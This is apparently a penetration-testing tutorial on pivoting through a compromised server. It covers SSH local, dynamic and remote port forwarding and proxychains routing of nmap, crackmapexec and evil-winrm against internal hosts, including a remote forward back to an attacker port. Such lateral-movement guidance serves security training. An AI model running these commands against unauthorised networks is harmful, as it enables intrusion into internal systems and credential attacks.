Network Pivoting
Past the Perimeter

The Pivot Concept

Pivoting means using a compromised machine as a relay to reach network segments you can't access directly. In a typical scenario: you compromise an internet-facing server. That server has two network interfaces — one on the external network, one on an internal segment with the database servers, domain controllers, and everything interesting. From your attack machine, those internal hosts are unreachable. But from the compromised server, they're right there.

The goal is to route your traffic through the pivot point so your attack tools can interact with internal hosts as if you were on the same network. Port forwarding does this for specific ports. SOCKS proxies do it for all TCP traffic. The choice depends on what tools you need to use and what's available on the pivot host.

SSH Tunneling

SSH has three tunnelling modes built in. Local port forwarding opens a port on your machine and forwards it to a destination accessible from the SSH server. Remote port forwarding opens a port on the SSH server and forwards it back to your machine. Dynamic port forwarding creates a SOCKS proxy on your local machine that routes all traffic through the SSH server.

ssh -L 8080:INTERNAL_HOST:80 user@PIVOT_IP
# Access INTERNAL_HOST:80 at localhost:8080

ssh -D 1080 user@PIVOT_IP
# SOCKS5 proxy at localhost:1080 — route all tools through it

ssh -R 4444:localhost:4444 user@PIVOT_IP
# Listen on PIVOT_IP:4444, forward back to attacker:4444

Proxychains and Tool Routing

Once you have a SOCKS proxy, proxychains lets you route almost any tool's traffic through it. It intercepts network calls and redirects them. Prefix your command with proxychains and the tool's traffic goes through your pivot.

# /etc/proxychains4.conf
socks5 127.0.0.1 1080

proxychains nmap -sT -p 80,443,22 INTERNAL_HOST
proxychains crackmapexec smb INTERNAL_SUBNET/24
proxychains evil-winrm -i INTERNAL_HOST -u user -p [REDACTED]